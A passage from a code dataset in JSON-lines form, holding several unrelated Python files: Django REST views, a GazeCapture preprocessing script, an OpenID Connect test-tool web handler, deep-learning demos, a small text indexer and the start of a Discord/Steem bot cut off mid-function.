zip(*columns.items())\n tmpfile.write(\"\\t\".join(values) + \"\\n\")\n\n for row in iterator:\n if not columns:\n keys = row[0].keys()\n values = keys\n columns = keys\n tmpfile.write(\"\\t\".join(values) + \"\\n\")\n\n tmpfile.write(\"\\t\".join(str(row[x]) for x in keys) + \"\\n\")\n\n tmpfile.close()\n\n if indices:\n indices = \" \".join(\"--add-index=%s\" % x for x in indices)\n else:\n indices = \"\"\n\n tmpfilename = tmpfile.name\n\n statement = '''\n python %(scriptsdir)s/csv2db.py %(csv2db_options)s\n --table=%(tablename)s\n %(indices)s\n < %(tmpfilename)s > %(outfile)s\n '''\n\n P.run()\n\n os.unlink(tmpfilename)\n","sub_path":"CGATPipelines/PipelineDatabase.py","file_name":"PipelineDatabase.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"67770776","text":"from django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom social_network.models import Posts, PostsReactions\nfrom social_network.serializers import PostsSerializer, PostsReactionsSerializer, UserSerializer\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\n\n\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\t\t\n\t\t\n@api_view(['POST'])\n@permission_classes((AllowAny, ))\n@csrf_exempt\ndef user_signup(request):\n data = JSONParser().parse(request)\n serializer = UserSerializer(data=data, context={'request': request})\n if serializer.is_valid():\n serializer.save()\n user = User.objects.get(username = data['username'])\n user.set_password(data['password'])\n user.save()\n return JSONResponse(serializer.data)\n else:\n return JSONResponse(serializer.errors, status=400)\n \n \n@api_view(['GET'])\n@permission_classes((IsAuthenticated, ))\n@csrf_exempt\ndef user_list(request):\n if request.method == 'GET':\n user = User.objects.filter(pk=request.user.id)\n serializer = UserSerializer(user, context={'request': request}, many=True)\n return JSONResponse(serializer.data)\n\n@api_view(['GET', 'PUT', 'DELETE'])\n@permission_classes((IsAuthenticated, ))\n@csrf_exempt\ndef user_detail(request, pk):\n try:\n user = User.objects.get(pk=pk, id=request.user.id)\n except User.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = UserSerializer(user, context={'request': request})\n return JSONResponse(serializer.data)\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = UserSerializer(user, data=data)\n if serializer.is_valid():\n serializer.save()\n return JSONResponse(serializer.data)\n return JSONResponse(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n user.delete()\n return HttpResponse(status=204)\n\t\t\n@api_view(['GET', 'POST'])\n@permission_classes((IsAuthenticated, ))\n@csrf_exempt\ndef posts_list(request):\n if request.method == 'GET':\n posts = Posts.objects.filter(user=request.user.id)\n serializer = PostsSerializer(posts, context={'request': request}, many=True)\n return JSONResponse(serializer.data)\n\n elif request.method == 'POST':\n \n data = JSONParser().parse(request)\n data['user'] = request.user.id\n \n serializer = PostsSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JSONResponse(serializer.data, status=201)\n return JSONResponse(serializer.errors, status=400)\n\n@api_view(['GET', 'PUT', 'DELETE'])\n@permission_classes((IsAuthenticated, ))\n@csrf_exempt\ndef posts_detail(request, pk):\n try:\n post = Posts.objects.get(pk=pk, user=request.user.id)\n except Posts.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = PostsSerializer(post, context={'request': request})\n return JSONResponse(serializer.data)\n\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n data['user'] = request.user.id\n data['post'] = pk\n \n serializer = PostsSerializer(post, data=data)\n if serializer.is_valid():\n serializer.save()\n \n return JSONResponse(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n post.delete()\n return HttpResponse(status=204)\n\t\t\n@api_view(['PUT'])\n@permission_classes((IsAuthenticated, ))\n@csrf_exempt\ndef posts_reaction(request, pk):\n data = JSONParser().parse(request)\n data['user'] = request.user.id\n data['post'] = pk\n reaction = data.get('like', None)\n if reaction is not None:\n reacted_posts = PostsReactions.objects.filter(post=pk, user=request.user.id)\n if reacted_posts:\n target_post = reacted_posts[0]\n # target_post.like = bool(reaction)\n # import pdb;pdb.set_trace()\n reaction_serializer = PostsReactionsSerializer(target_post, data=data)\n if reaction_serializer.is_valid():\n reaction_serializer.save()\n return JSONResponse(reaction_serializer.data, status=201)\n else:\n # import pdb;pdb.set_trace()\n reaction_serializer = PostsReactionsSerializer(data=data)\n if reaction_serializer.is_valid():\n reaction_serializer.save()\n return JSONResponse(reaction_serializer.data, status=201)\n \n return JSONResponse(serializer.data)","sub_path":"social_network/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"538852384","text":"\"\"\"\nЗадание_1. В диапазоне натуральных чисел от 2 до 99 определить,\nсколько из них кратны каждому из чисел в диапазоне от 2 до 9.\n\nПодсказка: используйте вложенный цикл\n\nПример:\nВ диапазоне 2-99: 49 чисел кратны 2\nВ диапазоне 2-99: 33 чисел кратны 3\nВ диапазоне 2-99: 24 чисел кратны 4\nВ диапазоне 2-99: 19 чисел кратны 5\nВ диапазоне 2-99: 16 чисел кратны 6\nВ диапазоне 2-99: 14 чисел кратны 7\nВ диапазоне 2-99: 12 чисел кратны 8\nВ диапазоне 2-99: 11 чисел кратны 9\n\"\"\"\n\n\n# for i in range(2, 10):\n# flag = 0\n# for j in range(2, 100):\n# if j % i == 0:\n# flag += 1\n# print(f'В диапазоне [2-99]: {flag} чисел кратны \\'{i}\\'')\n\n\n\n# # Вариант №2 через функцию\n# def cycle_method(from_n, to_n, from_r, to_r, output_str=''):\n# for i in range(from_n, to_n + 1):\n# flag = 0\n# for j in range(from_r, to_r + 1):\n# if j % i == 0:\n# flag += 1\n# output_str += f'В диапазоне [{from_r}-{to_r}]: {flag} чисел кратны \\'{i}\\'\\n'\n# return output_str\n#\n#\n# from_numb = 2\n# to_numb = 9\n# from_range = 2\n# to_range = 99\n#\n# print(cycle_method(from_numb, to_numb, from_range, to_range))\n\n\n# Вариант №2 через рекурсию\ndef recur_method(from_n, to_n, from_r, to_r, output_str=''):\n for i in range(from_n, to_n + 1):\n flag = 0\n for j in range(from_r, to_r + 1):\n if j % i == 0:\n flag += 1\n output_str += f'В диапазоне [{from_r}-{to_r}]: {flag} чисел кратны \\'{i}\\'\\n'\n print(output_str)\n if from_n > to_n:\n return recur_method(from_n, to_n, from_r, to_r)\n\n\nfrom_numb = 2\nto_numb = 9\nfrom_range = 2\nto_range = 99\n\nrecur_method(from_numb, to_numb, from_range, to_range)\n","sub_path":"Урок 3.Практическое задание/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"277411167","text":"from setuptools import setup\r\n\r\npackage_structure = [\r\n 'socialsim',\r\n 'socialsim.measurements',\r\n 'socialsim.measurements.model_parameters',\r\n 'socialsim.visualizations'\r\n]\r\n\r\npackage_requirements = [\r\n 'pandas',\r\n 'scipy>=1.2.1',\r\n 'scikit-learn>=0.20.2',\r\n 'fastdtw>=0.2.0',\r\n 'pysal>=2.0.0',\r\n 'tqdm>=4.31.1',\r\n 'burst_detection>=0.1.0',\r\n 'tsfresh>=0.11.2',\r\n 'joblib>=0.13.2',\r\n# 'networkx>=2.3',\r\n# 'python-louvain>=0.13'\r\n 'louvain>=0.6.1',\r\n 'cairocffi>=1.0.2'\r\n]\r\n\r\npackage_data = {\r\n 'socialsim.measurements.model_parameters': ['best_model.pkl']\r\n }\r\n\r\nsetup(name='socialsim',\r\n version='0.2.1',\r\n packages=package_structure,\r\n package_data=package_data,\r\n license='',\r\n url='',\r\n long_description='None',\r\n maintainer='Zachary New',\r\n maintainer_email='zachary.new@pnnl.gov',\r\n install_requires=package_requirements\r\n )\r\n\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"152388903","text":"from tokenization import ToTokenize\r\nfrom tokenization import TokenWithType\r\nimport shelve\r\nimport os\r\n\r\nclass Position:\r\n def __init__(self, start, end):\r\n self.start = start\r\n self.end = end\r\n \r\n def __repr__(self):\r\n \r\n return str(self.start) + ', ' + str(self.end)\r\n\r\n def __eq__(self, obj):\r\n\r\n return self.start == obj.start and self.end == obj.end\r\n \r\n\r\nclass ToIndex:\r\n \r\n def __init__(self, db_name):\r\n\r\n self.db = shelve.open(db_name, writeback=True)\r\n\r\n def __del__(self):\r\n\r\n self.db.close()\r\n \r\n def index(self, file_name):\r\n #self.db.clear()\r\n # Raise TypeError if the input type is not string \r\n if not isinstance(file_name, str):\r\n raise(TypeError)\r\n\r\n files = os.listdir()\r\n if file_name not in files:\r\n raise(ValueError)\r\n \r\n tokenizer = ToTokenize()\r\n # Open file\r\n text_file = open(file_name, 'r')\r\n # Read file and save as a string\r\n text_string = text_file.read()\r\n text_file.close()\r\n tokens = tokenizer.tokenize_reduced(text_string)\r\n for token in tokens:\r\n position = Position(token.start, token.start + len(token.wordform))\r\n self.db.setdefault(token.wordform, {}).setdefault(file_name, []).append(position)\r\n\r\n \r\n self.db.sync()\r\n \r\n \r\n\r\n \r\n \r\nif __name__ == '__main__':\r\n a = ToIndex('database')\r\n a.index(\"text.txt\")\r\n a.index(\"text2.txt\")\r\n","sub_path":"indexation.py","file_name":"indexation.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"150286773","text":"import json\nfrom math import ceil, floor\nfrom pathlib import Path\nfrom PIL import Image\nfrom tqdm import tqdm\nimport numpy as np\n\n\ndef read_json(path):\n with open(str(path), 'r') as f:\n return json.load(f)\n\n\ndef load_img(path, size=None): # size = (width, height)\n img = Image.open(path)\n if size:\n img = img.resize(size)\n return img\n\n\ndef get_type(path):\n return read_json(path / 'info.json')['Dataset']\n\n\ndef get_coor(idx, size, face_json, le_json, re_json, fg_json, screen_json):\n w, h = size\n\n if fg_json['IsValid'][idx] == 0:\n return None\n\n if screen_json['Orientation'][idx] != 1:\n return None\n\n fx, fy = floor(face_json['X'][idx]), floor(face_json['Y'][idx])\n fw, fh = ceil(face_json['W'][idx]), ceil(face_json['H'][idx])\n fx_1, fx_2 = (fx), (fx + fw)\n fy_1, fy_2 = (fy), (fy + fh)\n\n if fx < 0 or fy < 0 or fw <= 0 or fh <= 0:\n return None\n\n lx, ly = floor(le_json['X'][idx]), floor(le_json['Y'][idx])\n lw, lh = ceil(le_json['W'][idx]), ceil(le_json['H'][idx])\n rx, ry = floor(re_json['X'][idx]), floor(re_json['Y'][idx])\n rw, rh = ceil(re_json['W'][idx]), ceil(re_json['H'][idx])\n\n if lw <= 0 or lh <= 0:\n return None\n if rw <= 0 or rh <= 0:\n return None\n\n lx_1, lx_2 = (fx + lx), (fx + lx + lw)\n ly_1, ly_2 = (fy + ly), (fy + ly + lh)\n rx_1, rx_2 = (fx + rx), (fx + rx + rw)\n ry_1, ry_2 = (fy + ry), (fy + ry + rh)\n\n if not (0 <= lx_1 < lx_2 <= w and 0 <= ly_1 < ly_2 <= h):\n return None\n if not (0 <= rx_1 < rx_2 <= w and 0 <= ry_1 < ry_2 <= h):\n return None\n\n fg = np.zeros((25, 25), dtype=np.uint8)\n fg_x, fg_y = fg_json['X'][idx] - 1, fg_json['Y'][idx] - 1\n fg_w, fg_h = fg_json['W'][idx], fg_json['H'][idx]\n fg_x1, fg_x2 = (fg_x), (fg_x + fg_w)\n fg_y1, fg_y2 = (fg_y), (fg_y + fg_h)\n fg[fg_y1:fg_y2, fg_x1:fg_x2] = 1\n\n fc_coor = (fx_1, fx_2, fy_1, fy_2)\n le_coor = (lx_1, lx_2, ly_1, ly_2)\n re_coor = (rx_1, rx_2, ry_1, ry_2)\n\n return fc_coor, le_coor, re_coor, fg.flatten()\n\n\ndef gen(subjects, target_dir):\n fc_dir = target_dir / 'fc'\n le_dir = target_dir / 'le'\n re_dir = target_dir / 're'\n target_dir.mkdir(parents=True, exist_ok=True)\n fc_dir.mkdir(exist_ok=True)\n le_dir.mkdir(exist_ok=True)\n re_dir.mkdir(exist_ok=True)\n\n fc_paths, le_paths, re_paths, fgs, dots = [], [], [], [], []\n for subject in tqdm(subjects):\n dot_json = read_json(subject / 'dotInfo.json')\n face_json = read_json(subject / 'appleFace.json')\n le_json = read_json(subject / 'appleLeftEye.json')\n re_json = read_json(subject / 'appleRightEye.json')\n fg_json = read_json(subject / 'faceGrid.json')\n screen_json = read_json(subject / 'screen.json')\n # img_paths = sorted((subject / 'frames').iterdir())\n img_paths = (subject / 'frames').iterdir()\n\n for path in img_paths:\n idx = int(path.stem)\n img = load_img(path)\n\n res = get_coor(idx, img.size, face_json, le_json, re_json, fg_json,\n screen_json)\n if not res:\n continue\n fc_coor, le_coor, re_coor, fg = res\n (fx_1, fx_2, fy_1, fy_2) = fc_coor\n (lx_1, lx_2, ly_1, ly_2) = le_coor\n (rx_1, rx_2, ry_1, ry_2) = re_coor\n\n fc_path = (fc_dir / '{:08d}.jpg'.format(len(fc_paths)))\n le_path = (le_dir / '{:08d}.jpg'.format(len(le_paths)))\n re_path = (re_dir / '{:08d}.jpg'.format(len(re_paths)))\n\n fc_paths.append(fc_path.relative_to(target_dir))\n le_paths.append(le_path.relative_to(target_dir))\n re_paths.append(re_path.relative_to(target_dir))\n dots.append((dot_json['XCam'][idx], dot_json['YCam'][idx]))\n fgs.append(fg)\n\n fc_img = img.crop((fx_1, fy_1, fx_2, fy_2))\n le_img = img.crop((lx_1, ly_1, lx_2, ly_2))\n re_img = img.crop((rx_1, ry_1, rx_2, ry_2))\n fc_img.save(fc_path)\n le_img.save(le_path)\n re_img.save(re_path)\n\n with (target_dir / 'fc_list.txt').open('w') as f:\n f.write('\\n'.join(map(str, fc_paths)))\n with (target_dir / 'le_list.txt').open('w') as f:\n f.write('\\n'.join(map(str, le_paths)))\n with (target_dir / 're_list.txt').open('w') as f:\n f.write('\\n'.join(map(str, re_paths)))\n\n dots = np.array(dots, dtype=np.float32)\n fgs = np.array(fgs, dtype=np.uint8)\n np.save(str(target_dir / 'dots.npy'), dots)\n np.save(str(target_dir / 'fgs.npy'), fgs)\n\n\ndataset = Path('../GazeCapture')\n# subjects = sorted([x for x in dataset.iterdir() if x.is_dir()])\nsubjects = [x for x in dataset.iterdir() if x.is_dir()]\ntrain_subjects = [x for x in subjects if get_type(x) == 'train']\nval_subjects = [x for x in subjects if get_type(x) == 'val']\ntest_subjects = [x for x in subjects if get_type(x) == 'test']\n\ngen(train_subjects[:200], Path('./data/train'))\ngen(val_subjects[:50], Path('./data/val'))\n","sub_path":"gen_list.py","file_name":"gen_list.py","file_ext":"py","file_size_in_byte":5021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"570841873","text":"import logging\n\nimport cherrypy\nfrom cherrypy import CherryPyException\nfrom cherrypy import HTTPRedirect\nfrom jwkest import as_bytes\nfrom otest import Break\nfrom otest import exception_trace\nfrom otest.check import CRITICAL\nfrom otest.events import EV_EXCEPTION\nfrom otest.events import EV_FAULT\nfrom otest.events import EV_HTTP_ARGS\nfrom otest.events import EV_RESPONSE\nfrom otest.result import Result\n\nfrom oidctest.tt import conv_response\n\nlogger = logging.getLogger(__name__)\n\nBANNER = \"\"\"\nSomething went wrong! If you know or suspect you know why, then try to\nfix it. If you have no idea, then please tell us at certification@oidf.org\nand we will help you figure it out.\n\"\"\"\n\n\ndef expected_response_mode(conv):\n try:\n response_mode = conv.req.req_args[\"response_mode\"]\n except KeyError:\n if conv.req.req_args[\"response_type\"] == [''] or conv.req.req_args[\"response_type\"] == ['code']:\n response_mode = 'query'\n else:\n response_mode = 'fragment'\n else:\n if isinstance(response_mode, list):\n if len(response_mode):\n response_mode = response_mode[0]\n else:\n raise ValueError(\n 'Unknown response_mode value: {}'.format(response_mode))\n\n return response_mode\n\n\nclass Main(object):\n def __init__(self, tester, flows, webenv, pick_grp, **kwargs):\n self.tester = tester\n self.sh = tester.sh\n self.info = tester.inut\n self.flows = flows\n self.webenv = webenv\n self.pick_grp = pick_grp\n self.kwargs = kwargs\n\n @cherrypy.expose\n def index(self):\n try:\n if self.sh.session_init():\n return as_bytes(self.info.flow_list())\n else:\n try:\n _url = \"{}opresult#{}\".format(self.kwargs['base_url'],\n self.sh[\"testid\"][0])\n cherrypy.HTTPRedirect(_url)\n except KeyError:\n return as_bytes(self.info.flow_list())\n except cherrypy.HTTPRedirect:\n raise\n except Exception as err:\n exception_trace(\"display_test_list\", err)\n cherrypy.HTTPError(message=str(err))\n\n def _cp_dispatch(self, vpath):\n # Only get here if vpath != None\n ent = cherrypy.request.remote.ip\n logger.info('ent:{}, vpath: {}'.format(ent, vpath))\n\n if vpath[0] == 'continue':\n return self.next\n\n if len(vpath) == 1:\n if vpath[0] in self.flows:\n cherrypy.request.params['test'] = vpath.pop(0)\n return self.run\n elif len(vpath) == 2:\n if vpath[0] == 'test_info':\n cherrypy.request.params['test_id'] = vpath[1]\n return self.test_info\n\n def display_exception(self, exception_trace=''):\n \"\"\"\n So far only one known special response type\n\n :param exception_trace:\n :return: Bytes\n \"\"\"\n txt = [80 * '*', '\\n', BANNER, '\\n', 80 * '*', '\\n', '\\n', '\\n']\n txt.extend(exception_trace)\n cherrypy.response.headers['Content-Type'] = 'text/plain'\n return as_bytes(txt)\n\n @cherrypy.expose\n def run(self, test):\n try:\n resp = self.tester.run(test, **self.webenv)\n except HTTPRedirect:\n raise\n except Exception as err:\n #test_id = list(self.flows.complete.keys())[0]\n _trace = exception_trace('run', err, logger)\n self.tester.conv.events.store(EV_FAULT, _trace)\n return self.display_exception(exception_trace=_trace)\n\n self.sh['session_info'] = self.info.session\n\n if isinstance(resp, dict):\n return self.display_exception(**resp)\n elif resp is False or resp is True:\n pass\n elif isinstance(resp, list):\n return conv_response(self.sh.events, resp)\n elif isinstance(resp, bytes):\n return resp\n\n self.opresult()\n\n @cherrypy.expose\n def reset(self):\n self.sh.reset_session()\n return conv_response(self.sh.events, self.info.flow_list())\n\n @cherrypy.expose\n def pedit(self):\n try:\n return as_bytes(self.info.profile_edit())\n except Exception as err:\n return as_bytes(self.info.err_response(\"pedit\", err))\n\n @cherrypy.expose\n def profile(self, **kwargs):\n return as_bytes(self.tester.set_profile(kwargs))\n\n @cherrypy.expose\n def test_info(self, test_id):\n try:\n return as_bytes(self.info.test_info(test_id))\n except KeyError:\n raise cherrypy.HTTPError(404, test_id)\n\n @cherrypy.expose\n def next(self, **kwargs):\n resp = self.tester.cont(**kwargs)\n self.sh['session_info'] = self.info.session\n if resp:\n if isinstance(resp, int):\n if resp == CRITICAL:\n exp = self.tester.conv.events.get_data(EV_EXCEPTION)\n if exp:\n raise cherrypy.HTTPError(message=exp[0])\n else:\n self.opresult()\n else:\n return conv_response(self.sh['conv'].events, resp)\n else:\n self.opresult()\n\n @cherrypy.expose\n def display(self):\n return as_bytes(self.info.flow_list())\n\n def opresult(self):\n try:\n # return info.flow_list()\n _url = \"{}display#{}\".format(\n self.webenv['client_info']['base_url'],\n self.pick_grp(self.sh['conv'].test_id))\n\n raise HTTPRedirect(_url, 303)\n except KeyError as err:\n logger.error(err)\n raise CherryPyException(err)\n\n def process_error(self, msg, context):\n # test_id = list(self.flows.complete.keys())[0]\n self.tester.conv.events.store(EV_RESPONSE, msg)\n self.tester.conv.events.store(EV_FAULT, 'Error in {}'.format(context))\n # self.tester.conv.events.store(EV_CONDITION, State('Done', status=OK))\n res = Result(self.sh, self.flows.profile_handler)\n self.tester.store_result(res)\n logger.error('Encountered: {} in \"{}\"'.format(msg, context))\n self.opresult()\n\n @cherrypy.expose\n # @cherrypy.tools.allow(methods=[\"GET\"])\n def authz_cb(self, **kwargs):\n if cherrypy.request.method != 'GET':\n # You should only get query/fragment here using GET\n return self.process_error(\n 'Wrong HTTP method used expected GET got \"{}\". Could be that '\n 'I got a form_post to the wrong redirect_uri'.format(\n cherrypy.request.method), 'authz_cb')\n\n _conv = self.sh[\"conv\"]\n try:\n _response_mode = expected_response_mode(_conv)\n except ValueError as err:\n return self.process_error(err, 'authz_cb')\n\n if _response_mode == \"form_post\":\n return self.process_error(\"Expected form_post, didn't get it\",\n 'authz_cb')\n elif _response_mode == 'fragment':\n try:\n kwargs = cherrypy.request.params\n except KeyError:\n pass\n else:\n _conv.events.store(EV_HTTP_ARGS, kwargs, ref='authz_cb')\n _conv.query_component = kwargs\n\n return self.info.opresult_fragment()\n\n if kwargs == {}: # This should never be the case\n return self.process_error(\n 'Got empty response could be I got something fragment '\n 'encoded. Expected query response mode', 'authz_cb')\n\n _conv.events.store(EV_RESPONSE, 'Response URL with query part')\n\n try:\n resp = self.tester.async_response(self.webenv[\"conf\"],\n response=kwargs)\n except cherrypy.HTTPRedirect:\n raise\n except Break:\n resp = False\n self.tester.store_result()\n except Exception as err:\n _trace = exception_trace('authz_cb', err, logger)\n _conv.events.store(EV_FAULT, _trace)\n self.tester.store_result()\n return self.display_exception(exception_trace=_trace)\n\n if resp is False or resp is True:\n pass\n elif isinstance(resp, dict) and 'exception_trace' in resp:\n return self.display_exception(**resp)\n elif not isinstance(resp, int):\n return resp\n\n self.opresult()\n\n @cherrypy.expose\n # @cherrypy.tools.allow(methods=[\"POST\"])\n def authz_post(self, **kwargs):\n if cherrypy.request.method != 'POST':\n return self.process_error(\n 'Wrong HTTP method used expected POST got \"{}\"'.format(\n cherrypy.request.method),\n 'authz_post')\n\n _conv = self.sh[\"conv\"]\n try:\n _response_mode = expected_response_mode(_conv)\n except ValueError as err:\n return self.process_error(err, 'authz_cb')\n\n # Can get here 2 ways, either directly if form_post is used or\n # indirectly if fragment encoding\n if _response_mode == 'query': # should not be here at all\n if 'fragment' in kwargs:\n return self.process_error(\n 'Expected URL with query part got fragment', 'authz_post')\n else:\n return self.process_error(\n 'Expected URL with query part got form_post', 'authz_post')\n elif _response_mode == 'fragment':\n if 'fragment' in kwargs: # everything OK\n self.tester.conv.events.store(EV_RESPONSE,\n 'URL with fragment')\n else:\n return self.process_error(\n 'Expected URL with fragment part got form_post',\n 'authz_post')\n else:\n self.tester.conv.events.store(EV_RESPONSE, 'Form post')\n\n try:\n resp = self.tester.async_response(self.webenv[\"conf\"],\n response=kwargs)\n except cherrypy.HTTPRedirect:\n raise\n except Exception as err:\n _trace = exception_trace('authz_post', err, logger)\n return self.display_exception(exception_trace=_trace)\n # return self.info.err_response(\"authz_cb\", err)\n else:\n if resp is False or resp is True:\n pass\n elif not isinstance(resp, int):\n return resp\n\n self.opresult()\n","sub_path":"src/oidctest/optt/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"484202431","text":"from d2l import AllDeepLearning as d2l\nfrom mxnet import autograd, gluon, init, nd\nfrom mxnet.gluon import nn\n\nT = 1000\ntime = nd.arange(0, T)\nx = nd.sin(0.01 * time) + 0.2 * nd.random.normal(shape=T)\ntau = 4\nfeatures = nd.zeros((T-tau, tau))\nfor i in range(tau):\n features[:, i] = x[i: T-tau+i]\nlabels = x[tau:]\nbatch_size, n_train = 16, 600\ntrain_iter = d2l.load_array((features[:n_train], labels[:n_train]), batch_size, is_train=True)\ntest_iter = d2l.load_array((features[:n_train], labels[:n_train]), batch_size, is_train=False)\n\n\ndef get_net():\n net = nn.Sequential()\n net.add(nn.Dense(10, activation='relu'),\n nn.Dense(1))\n net.initialize(init.Xavier())\n return net\n\n\nloss = gluon.loss.L2Loss()\n\n\ndef train_net(net, train_iter, test_iter, loss, epochs, lr):\n trainer = gluon.Trainer(net.collect_params(), 'adam', {'learning_rate': lr})\n for epoch in range(1, epochs+1):\n for X, y in train_iter:\n with autograd.record():\n l = loss(net(X), y)\n l.backward()\n trainer.step(batch_size)\n print('epoch: %d, loss: %f' % (epoch, d2l.evaluate_loss(net, train_iter, loss)))\n\n\nnet = get_net()\nprediction = nd.zeros(T)\nprediction[:n_train] = x[:n_train]\nfor i in range(n_train, T):\n prediction[i] = net(prediction[i-tau:i].reshape(1, -1)).reshape(1)\n\ntrain_net(net, train_iter, test_iter, loss, 10, 0.01)\nestimates = net(features)\nk = 33\nfeatures = nd.zeros((k, T-k))\nfor i in range(tau):\n features[i] = x[i:T-k+i]\nfor i in range(tau, k):\n features[i] = net(features[i-tau:i].T).T\n\nsteps = [4, 8, 16, 32]\nd2l.plot([time[i:T-k+i] for i in steps], [features[i] for i in steps],\n legend=[\"step %d\" % i for i in steps], figsize=(4.5, 2.5))\nd2l.plt.show()\n#\n# d2l.plot([time, time[tau:], time[n_train:]],\n# [x, estimates, prediction[n_train:]],\n# legend=[\"data\", \"estimates\", \"multistep\"])\n# d2l.plt.show()\n","sub_path":"AILearning/RecurrentNeuronNetwork/SequenNetwork.py","file_name":"SequenNetwork.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602645397","text":"# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\nrandom augment class\n\"\"\"\nimport numpy as np\nimport mindspore.dataset.vision as vision\nfrom src import transform_utils\n\nIMAGENET_DEFAULT_MEAN = (0.485, 0.456, 0.406)\nIMAGENET_DEFAULT_STD = (0.229, 0.224, 0.225)\n\nclass RandAugment:\n \"\"\"\n random augment\n \"\"\"\n # config_str belongs to str\n # hparams belongs to dict\n def __init__(self, config_str=\"rand-m9-mstd0.5\", hparams=None):\n hparams = hparams if hparams is not None else {}\n self.config_str = config_str\n self.hparams = hparams\n\n def __call__(self, imgs, labels, batch_info):\n # assert the imgs object are pil_images\n ret_imgs = []\n ret_labels = []\n py_to_pil_op = vision.ToPIL()\n to_tensor = vision.Tensor()\n normalize_op = vision.Normalize(IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD, is_hwc=False)\n rand_augment_ops = transform_utils.rand_augment_transform(self.config_str, self.hparams)\n for i, image in enumerate(imgs):\n img_pil = py_to_pil_op(image)\n img_pil = rand_augment_ops(img_pil)\n img_array = to_tensor(img_pil)\n img_array = normalize_op(img_array)\n ret_imgs.append(img_array)\n ret_labels.append(labels[i])\n return np.array(ret_imgs), np.array(ret_labels)\n","sub_path":"research/cv/ISyNet/src/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"80211608","text":"\t# These are the dependecies. The bot depends on these to function, hence the name. Please do not change these unless your adding to them, because they can break the bot.\nimport discord\nimport asyncio\nimport datetime\nfrom steem import Steem\nfrom steem.post import Post\nfrom discord.ext.commands import Bot\nfrom discord.ext import commands\nfrom coinmarketcap import Market\nimport os\n\n# Here you can modify the bot's prefix and description and wether it sends help in direct messages or not. @client.command is strongly discouraged, edit your commands into the command() function instead.\nclient = Bot(description=\"Server-Management-Bot\", command_prefix='!', pm_help = True)\ns = Steem(nodes=[\"https://api.steemit.com\"])\nreact_dict = {}\ncmc = Market() # Coinmarketcap API call.\nbot_role = 'marshal' # Set a role for all of your bots here. You need to give them such role on the discord server.\nste_usd = cmc.ticker(\"steem\", limit=\"3\", convert=\"USD\")[0].get(\"price_usd\", \"none\")\nsbd_usd = cmc.ticker(\"steem-dollars\", limit=\"3\", convert=\"USD\")[0].get(\"price_usd\", \"none\")\nbtc_usd = cmc.ticker(\"bitcoin\", limit=\"3\", convert=\"USD\")[0].get(\"price_usd\", \"none\")\n\nallowed_channels = ['387030201961545728', #community-review\n]\n\nmoderating_roles = ['developers', # Keep them lower case.\n'moderators']\n\nchannels_list = ['389762510779187200', #introduceyourself\n'389608804972756993', #steemit\n'389762038408282112', #bitcoin\n'389762302330535946', #cryptocurrency\n'389762891823316992', #blog\n'389761959014432778', #steem\n'389764215537270787', #crypto\n'389764282700660737', #health\t\n'389764314313129984', #science\n'389890366427627520', #technology\n'389890644551794688', #programming\n'389890578499764226', #tutorials\n'389764366456586240' #all_other\n]\n\ntag_list = ['introduceyourself',\n'steemit',\n'bitcoin',\n'cryptocurrency',\n'blog',\n'steem',\n'crypto',\n'health',\n'science',\n'technology',\n'programming',\n]\n\n#########################\n# DEFINE FUNCTIONS HERE #\n#########################\n\n # Used to run any commands. Add your custom commands here, each under a new elif command.startswith(name):.\nasync def command(msg,command):\n\tcommand = str(command)\n\tcommand = command[1:]\n\tif command.startswith('ping'):\n\t\tawait client.send_message(msg.channel,\":ping_pong: Pong!\")\n\telif command.startswith('users'):\n\t\tlist_of_users = []\n\t\tusers_online = client.get_all_members()\n\t\tfor member in users_online:\n\t\t\tlist_of_users.append(member.roles)\n\t\tawait 